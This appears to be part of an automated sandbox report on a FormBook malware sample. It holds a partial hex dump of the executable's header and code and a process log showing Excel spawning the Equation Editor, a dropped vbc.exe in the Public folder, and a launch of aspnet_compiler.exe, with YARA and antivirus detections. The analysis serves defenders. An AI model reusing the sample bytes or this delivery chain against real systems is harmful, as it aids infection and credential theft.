    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ba 1f 7e 62 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 76 03 00 00 7c 03 00 00 00 00 00 ca 95 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 95 03 00 57 00 00 00 00 c0 03 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 0c 00 00 00 18 50 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 75 03 00 00 20 00 00 00 76 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 03 00 00 02 00 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 c8 05 00 00 00 c0 03 00 00 06 00 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 95 03 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 50 03 00 d4 44 00 00 03 00 02 00 03 00 00 06 08 3d 00 00 10 13 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 00 28 0b 00 00 06 00 2a 00 00 00 03 30 09 00 07 00 00 00 00 00 00 00 02 28 3e 00 00 0a 2a 00 13 30 08 00 36 02 00 00 01 00 00 11 2b 07 26 16 28 11 00 00 06 1a 28 11 00 00 06 1e 28 11 00 00 06 3a e9 01 00 00 18 45 01 00 00 00 f6 ff ff ff 17 2d 06 d0 03 00 00 06 26 26 00 17 28 18 00 00 06 20 79 e7 07 00 28 18 00 00 06 25 26 20 7e e7 07 00 28 18 00 00 06 25 26 28 7f 00 00 06 20 81 e7 07 00 28 18 00 00 06 20 88 e7 07 00 28 18 00 00 06 28 80 00 00 06 20 8b e7 07 00 28 18 00 00 06 20 8e e7 07 00 28 18 00 00 06 28 80 00 00 06 20 91 e7 07 00 28 18 00 00 06 20 94 e7 07 00 28 18 00 00 06 25 26 28 80 00 00 06 20 97 e7 07 00 28 18 00 00 06 25 26 20 a0 e7 07 00 28 18 00 00 06 28 80 00 00 06 0a 1f 0c 28 11 00 00 06 28 06 00 00 06 3a 0d 01 00 00 1a 45 01 00 00 00 f6 ff ff ff 26 1f 10 28 11 00 00 06 1f 14 28 11 00 00 06 39 19 01 00 00 26 06 28 a4 00 00 06 0b 1f 18 28 11 00 00 06 28 05 00 00 06 25 26 3a fe 00 00 00 1d 45 01 00 00 00 f6 ff ff ff 26 11 05 08 28 c4 00 00 06 09 1f 1c 28 11 00 00 06 14 14 11 06 28 d9 00 00 06 25 26 28 ba 00 00 06 26 1f 20 28 11 00 00 06 38 c6 00 00 00 1f 24 28 11 00 00 06 28 96 00 00 06 25 1f 28 28 11 00 00 06 11 04 a2 25 1f 2c 28 11 00 00 06 7e 3f 00 00 0a a2 25 1f 30 28 11 00 00 06 07 a2 25 1f 34 28 11 00 00 06
    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL~b.v| @ `pWP H.textu v `.relocx@B.rsrcz@@HPD="(*0(>*06+&(((:E-&&( y(%& ~(%&( ( (( ( (( ( (%&( (%& ((((:E&((9&(((%&:E&(((%&(& (8$((%((%,(~?%0(%4(


    Statistics

    Behavior

    Click to jump to process

    System Behavior

    General

    Target ID:0
    Start time:15:14:14
    Start date:14/05/2022
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Imagebase:0x13f780000
    File size:28253536 bytes
    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Target ID:2
    Start time:15:14:38
    Start date:14/05/2022
    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Wow64 process (32bit):true
    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Imagebase:0x400000
    File size:543304 bytes
    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Target ID:4
    Start time:15:14:42
    Start date:14/05/2022
    Path:C:\Users\Public\vbc.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\Public\vbc.exe"
    Imagebase:0x300000
    File size:229376 bytes
    MD5 hash:CE42FE431B88922AB59B6FD880CADCF6
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:.Net C# or VB.NET
    Yara matches:
    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
    Antivirus matches:
    • Detection: 100%, Joe Sandbox ML
    • Detection: 41%, ReversingLabs
    Reputation:low

    General

    Target ID:5
    Start time:15:14:44
    Start date:14/05/2022
    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Imagebase:0x1e0000
    File size:55488 bytes
    MD5 hash:6D0C232D1F4CD357FD7C14ED6FABFA90
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate

    Disassembly

    No disassembly